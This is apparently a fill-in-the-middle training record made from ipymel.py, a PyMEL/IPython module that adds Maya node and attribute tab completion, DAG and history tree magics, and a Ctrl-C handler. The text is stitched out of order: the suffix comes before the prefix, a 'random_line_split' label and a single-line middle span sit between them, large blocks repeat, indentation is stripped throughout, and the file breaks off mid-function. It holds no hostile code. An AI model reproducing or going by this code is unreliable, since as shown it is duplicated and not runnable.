# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
        # we have a full node, get its children
else:
matches = get_children(nametext, dagOnly)
if not matches:
raise TryNext
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
            ps = ip.ev('_sh[-2]')
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def sigint_plugin_loaded_callback(*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler() | sigint_plugin_loaded_callback_id = None
DAG_MAGIC_COMPLETER_RE = re.compile(r"(?P<preamble>%dag\s+)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)*)(?P<current_part>[a-zA-Z0-9:_]*))$")
DAG_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)+)(?P<current_part>[a-zA-Z0-9:_]*))$")
NAME_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_.]*(\.|\|))*)(?P<current_part>[a-zA-Z0-9:_]*))$")
ATTR_RE = re.compile(r"""(?P<prefix>[a-zA-Z_0-9|:.]+)\.(?P<partial_attr>\w*)$""")
def setup(shell):
global ip
if hasattr(shell, 'get_ipython'):
ip = shell.get_ipython()
else:
ip = get_ipython()
ip.set_hook('complete_command', pymel_python_completer, re_key="(?!{})".format(NAME_COMPLETER_RE.pattern))
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_MAGIC_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_name_completer, re_key=NAME_COMPLETER_RE.pattern)
ip.set_hook('complete_command', open_completer, str_key="openf")
ip.ex("from pymel.core import *")
# stuff in __main__ is not necessarily in ipython's 'main' namespace... so
# if the user has something in userSetup.py that he wants put in the
# "interactive" namespace, it won't be - unless we do this:
ip.ex('from __main__ import *')
# if you don't want pymel imported into the main namespace, you can replace the above with something like:
#ip.ex("import pymel as pm")
define_magic(ip, openf)
define_magic(ip, dag)
define_magic(ip, dghist)
# add projects
ip.ex("""
import os.path
for _mayaproj in optionVar.get('RecentProjectsList', []):
_mayaproj = os.path.join( _mayaproj, 'scenes' )
if _mayaproj not in _dh:
_dh.append(_mayaproj)""")
# add files
ip.ex("""
import os.path
_sh=[]
for _mayaproj in optionVar.get('RecentFilesList', []):
if _mayaproj not in _sh:
_sh.append(_mayaproj)""")
# setup a handler for ctrl-c / SIGINT / KeyboardInterrupt, so maya / ipymel
# doesn't quit
install_sigint_handler(force=True)
# unfortunately, when Mental Ray loads, it installs a new SIGINT handler
# which restores the old "bad" behavior... need to install a plugin callback
# to restore ours...
global sigint_plugin_loaded_callback_id
import pymel.core as pm
if sigint_plugin_loaded_callback_id is None:
sigint_plugin_loaded_callback_id = pm.api.MSceneMessage.addStringArrayCallback(
pm.api.MSceneMessage.kAfterPluginLoad,
sigint_plugin_loaded_callback)
def main():
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver >= [1, 0]:
import IPython.terminal.ipapp
app = IPython.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
elif ipy_ver >= [0, 11]:
import IPython.frontend.terminal.ipapp
app = IPython.frontend.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
else:
import IPython.Shell
shell = IPython.Shell.start()
setup(shell)
shell.mainloop()
if __name__ == '__main__':
main() | random_line_split |
|
ipymel.py | """
pymel ipython configuration
Current Features
----------------
tab completion of depend nodes, dag nodes, and attributes
automatic import of pymel
Future Features
---------------
- tab completion of PyNode attributes
- color coding of tab complete options
- to differentiate between methods and attributes
- dag nodes vs depend nodes
- shortNames vs longNames
- magic commands
- bookmarking of maya's recent project and files
To Use
------
place in your PYTHONPATH
add the following line to the 'main' function of $HOME/.ipython/ipy_user_conf.py::
import ipymel
Author: Chad Dombrova
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from past.builtins import basestring
from builtins import object
from optparse import OptionParser
try:
import maya
except ImportError as e:
print("ipymel can only be setup if the maya package can be imported")
raise e
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver < [0, 11]:
def get_ipython():
import IPython.ipapi
return IPython.ipapi.get()
IPython.ipapi.IPApi.define_magic = IPython.ipapi.IPApi.expose_magic
import IPython.ColorANSI as coloransi
from IPython.genutils import page
from IPython.ipapi import UsageError
import IPython.Extensions.ipy_completers
def get_colors(obj):
return color_table[obj.rc.colors].colors
else: # >= [0, 11]
import IPython.utils.coloransi as coloransi
from IPython.core.page import page
from IPython.core.error import UsageError
def get_colors(obj):
return color_table[ip.colors].colors
if ipy_ver >= [0, 13]:
def define_magic(interpreter, function):
def get_ipython():
return interpreter
from IPython.core.magic import register_line_magic
register_line_magic(function)
else:
def define_magic(interpreter, function):
interpreter.define_magic(function.__name__, function)
try:
from IPython.core.error import TryNext
except ImportError:
from IPython.ipapi import TryNext
Colors = coloransi.TermColors
ColorScheme = coloransi.ColorScheme
ColorSchemeTable = coloransi.ColorSchemeTable
ip = None
try:
import readline
except ImportError:
import pyreadline as readline
delim = readline.get_completer_delims()
delim = delim.replace('|', '') # remove pipes
delim = delim.replace(':', '') # remove colon
# delim = delim.replace("'", '') # remove quotes
# delim = delim.replace('"', '') # remove quotes
readline.set_completer_delims(delim)
import inspect
import re
import glob
import os
import shlex
import sys
# don't import pymel here, as this will trigger loading of maya/pymel
# immediately, and things in the userSetup.py won't get properly entered into
# the ipython shell's namespace... we need the startup of maya to happen
# from "within" ipython, ie, when we do:
# ip.ex("from pymel.core import *")
# from pymel import core
# we also can't even use maya.cmds, because it doesn't work in anything other
# than the main thread... and most of the tab-completion stuff runs in a
# subthread... so api it is!
# Use api2 because it's faster...
import maya.api.OpenMaya as om
_scheme_default = 'Linux'
# Build a few color schemes
NoColor = ColorScheme(
'NoColor', {
'instance': Colors.NoColor,
'collapsed': Colors.NoColor,
'tree': Colors.NoColor,
'transform': Colors.NoColor,
'shape': Colors.NoColor,
'nonunique': Colors.NoColor,
'nonunique_transform': Colors.NoColor,
'normal': Colors.NoColor # color off (usu. Colors.Normal)
})
LinuxColors = ColorScheme(
'Linux', {
'instance': Colors.LightCyan,
'collapsed': Colors.Yellow,
'tree': Colors.Green,
'transform': Colors.White,
'shape': Colors.LightGray,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
LightBGColors = ColorScheme(
'LightBG', {
'instance': Colors.Cyan,
'collapsed': Colors.LightGreen,
'tree': Colors.Blue,
'transform': Colors.DarkGray,
'shape': Colors.Black,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
# Build table of color schemes (needed by the dag_parser)
color_table = ColorSchemeTable([NoColor, LinuxColors, LightBGColors],
_scheme_default)
color_table['Neutral'] = LightBGColors
def splitDag(obj):
buf = obj.split('|')
tail = buf[-1]
path = '|'.join(buf[:-1])
return path, tail
def expand(obj):
"""
allows for completion of objects that reside within a namespace. for example,
``tra*`` will match ``trak:camera`` and ``tram``
for now, we will hardwire the search to a depth of three recursive namespaces.
TODO:
add some code to determine how deep we should go
"""
return (obj + '*', obj + '*:*', obj + '*:*:*')
def api_ls(args, dagOnly, long=False):
'''Because the tab completer runs in a subthread, and cmds.ls doesn't
seem to work very well from a subthread, use maya.api.OpenMaya'''
sel = om.MSelectionList()
if isinstance(args, basestring):
args = [args]
for arg in args:
# if it doesn't exist, MSelectionList.add will raise an error -
# ignore that
try:
sel.add(arg)
except Exception:
pass
if not long and not dagOnly:
return list(sel.getSelectionStrings())
# long is only used when getting nodes, not plugs, so ignore that case
# for now...
results = []
mfnDep = om.MFnDependencyNode()
for i in range(sel.length()):
try:
dagPath = sel.getDagPath(i)
except TypeError:
if dagOnly:
continue
mobj = sel.getDependNode(i)
mfnDep.setObject(mobj)
results.append(mfnDep.name())
else:
if long:
results.append(dagPath.fullPathName())
else:
results.append(dagPath.partialPathName())
return results
def api_children(path):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
        # we have a full node, get its children
else:
matches = get_children(nametext, dagOnly)
if not matches:
|
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
Display the upstream (input) connection history of the given node(s) as a tree.
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
